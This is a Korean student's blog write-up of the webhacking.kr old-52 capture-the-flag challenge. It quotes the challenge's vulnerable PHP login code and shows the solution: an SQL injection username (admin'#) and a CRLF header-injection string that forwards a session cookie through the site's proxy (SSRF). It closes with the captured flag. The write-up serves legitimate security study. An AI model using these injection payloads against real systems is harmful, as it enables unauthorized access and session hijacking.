Web Hacking 과제_1(webhacking.kr /old-52)

 

🔻 과제 1

 

 

 

 

일단 내가 수행해야할 미션이 admin page를 접근해야하는 것이고, guest로 로그인하기위한 방법이 제시되어 있다.

 

 

 

 

우선 제시된 것처럼 guest로 로그인을 해봤다.

 

이제 admin으로 접속할 방법을 찾아봐야겠다.

 

 

proxy를 눌러보니 위와 같이 Request와 Response의 정보가 떴다.

해당 문제를 풀기위해서는 Burp Suite을 통해서 접근해야할 것 같은 느낌이 들었다.

 

 

 

 

프로그램을 실행시켜서 브라우저를 오픈해서 해당 사이트를 들어가니, 에러가 났다.

 

 

해당 에러에 대해서 찾아보았는데,  HTTPS를 통해 HTTP포트에 액세스했기 때문에 발생했다고 한다.

이해를 잘 못하겠어서 해당 내용과 문제 풀이 방법에 대해 찾아보았다.

 

일단 해당문제에 proxy부분을 보고 burp suite만 생각하느라 admin page 소스코드를 살펴보는 것을 놓쳤다.

 

<?php
include "config.php";
if($_GET['view_source']) view_source();
if($_GET['logout'] == 1){
  $_SESSION['login']="";
  exit("<script>location.href='./';</script>");
}
if($_SESSION['login']){
  echo "hi {$_SESSION['login']}<br>";
  if($_SESSION['login'] == "admin"){
    if(preg_match("/^172\.17\.0\./",$_SERVER['REMOTE_ADDR'])) echo $flag;
    else echo "Only access from virtual IP address";
  }
  else echo "You are not admin";
  echo "<br><a href=./?logout=1>[logout]</a>";
  exit;
}
if(!$_SESSION['login']){
  if(preg_match("/logout=1/",$_SERVER['HTTP_REFERER'])){
    header('WWW-Authenticate: Basic realm="Protected Area"');
    header('HTTP/1.0 401 Unauthorized');
  }
  if($_SERVER['PHP_AUTH_USER']){
    $id = $_SERVER['PHP_AUTH_USER'];
    $pw = $_SERVER['PHP_AUTH_PW'];
    $pw = md5($pw);
    $db = dbconnect();
    $query = "select id from member where id='{$id}' and pw='{$pw}'";
    $result = mysqli_fetch_array(mysqli_query($db,$query));
    if($result['id']){
      $_SESSION['login'] = $result['id'];
      exit("<script>location.href='./';</script>");
    }
  }
  if(!$_SESSION['login']){
    header('WWW-Authenticate: Basic realm="Protected Area"');
    header('HTTP/1.0 401 Unauthorized');
    echo "Login Fail";
  }
}

 

프록시 서버는 page 변수로 주어진 경로의 값을 읽어 와 준다고 한다.

 

include "config.php";
if($_GET['view_source']) view_source();
if($_GET['logout'] == 1){
  $_SESSION['login']="";
  exit("<script>location.href='./';</script>");
}

 

로그아웃 시 login 세션이 빈 세션으로 지정, index 페이지로 리다이렉트 된다.

 

if($_SESSION['login']){
  echo "hi {$_SESSION['login']}<br>";
  if($_SESSION['login'] == "admin"){
    if(preg_match("/^172\.17\.0\./",$_SERVER['REMOTE_ADDR'])) echo $flag;
    else echo "Only access from virtual IP address";
  }
  else echo "You are not admin";
  echo "<br><a href=./?logout=1>[logout]</a>";
  exit;
}

 

로그인 세션이 있을 경우 , hi 로그인 세션을 출력

 

로그인 세션이 admin이면, 접속한 주소가 172.17.0.x 이면 flag를 출력하도록 되어 있고,

아닐경우 (else) admin 아니라고 문구를 출력한다.

 

if(!$_SESSION['login']){
  if(preg_match("/logout=1/",$_SERVER['HTTP_REFERER'])){
    header('WWW-Authenticate: Basic realm="Protected Area"');
    header('HTTP/1.0 401 Unauthorized');
  }
  if($_SERVER['PHP_AUTH_USER']){
    $id = $_SERVER['PHP_AUTH_USER'];
    $pw = $_SERVER['PHP_AUTH_PW'];
    $pw = md5($pw);
    $db = dbconnect();
    $query = "select id from member where id='{$id}' and pw='{$pw}'";
    $result = mysqli_fetch_array(mysqli_query($db,$query));
    if($result['id']){
      $_SESSION['login'] = $result['id'];
      exit("<script>location.href='./';</script>");
    }
  }
  if(!$_SESSION['login']){
    header('WWW-Authenticate: Basic realm="Protected Area"');
    header('HTTP/1.0 401 Unauthorized');
    echo "Login Fail";
  }
}

 

로그인 세션이 없을 경우 , id 와 pw 파라미터를 통해 쿼리문에 id와 pw을 삽입하여 로그인 할 수 있음.

 

if(preg_match("/logout=1/",$_SERVER['HTTP_REFERER'])){
    header('WWW-Authenticate: Basic realm="Protected Area"');
  header('HTTP/1.0 401 Unauthorized');
}

 

 

 

 WWW-Authenticate 해더를 볼 수 있는데, 이것이 http 인증을 한다는 것으로 생각하면 된다고 한다.

 

HTTP 인증 - HTTP | MDN (mozilla.org)

HTTP 인증 - HTTP | MDN

 

 

참고로, 로그인 취소를 누르면 아래와 같이 Login Fail이 뜨면서 소스 코드를 볼 수 있다.

  

 

 

... 생략 ...
  if($_SESSION['login'] == "admin"){
    if(preg_match("/^172\.17\.0\./",$_SERVER['REMOTE_ADDR'])) echo $flag;
    else echo "Only access from virtual IP address";
... 생략 ...

    $id = $_SERVER['PHP_AUTH_USER'];
    $pw = $_SERVER['PHP_AUTH_PW'];
    $pw = md5($pw);
    $db = dbconnect();
    $query = "select id from member where id='{$id}' and pw='{$pw}'";
    $result = mysqli_fetch_array(mysqli_query($db,$query));
    if($result['id']){
      $_SESSION['login'] = $result['id'];
      exit("<script>location.href='./';</script>");
    }
... 생략 ...

 

필터링이 없어 간단한 SQLi를 하라는 로직과 proxy를 이용하라는 로직을 확인하고, 먼저 admin page에서 아이디에

admin'#를 넣고 패스워드를 아무거나 입력하여 $_SESSION['login']에 admin 값을 넣기.

 

 

그러면 이렇게 뜬다.

 

그리고나서 proxy 페이지를 가보면 아래와 같은 화면이 나온다.

 

 

Proxy를 이용한 Request는 Cookie에 PHPSESSID가 없어서 admin 페이지에 접근하여도 인증이 되지 않는다.

따라서 아래와 같이 Header를 넣어준다.

 

page?=/admin/ HTTP/1.1%0d%0aHost: webhacking.kr:10008%0d%0aCookie:%20PHPSESSID=gbruj631fl7lvhbu3im66fa0s0%0d%0aConnection: Close%0d%0a%0d%0a

 

 

아래와 같이 Flag를 획득하였다. 

 

FLAG{Server_Side_Request_Forgery_with_proxy!}

 

 

느낀점 : 오랜만에 웹해킹 문제를 푼 것도 있지만, 이전 과제들보다 훨씬 업그레이드된 수업 내용과 과제였던 것 같다.

문제를 푸는 데 있어서는 조금 어려움이 있어서 도움을 많이 받았고, 문제를 푸는 방식도 백퍼센트 이해할 수는 없었지만, 지속적으로 공부하고 복습하면서 내용을 이해해야하면 많은 도움이 될 것 같다는 생각이 드는 과제였다.

 

열심히 공부하는 수밖에!!   

 

 

 

[ 학습 참고 자료 ]

[Webhacking.kr] Old - 52 Write Up (tistory.com)

[Webhacking.kr] Old - 52 Write Up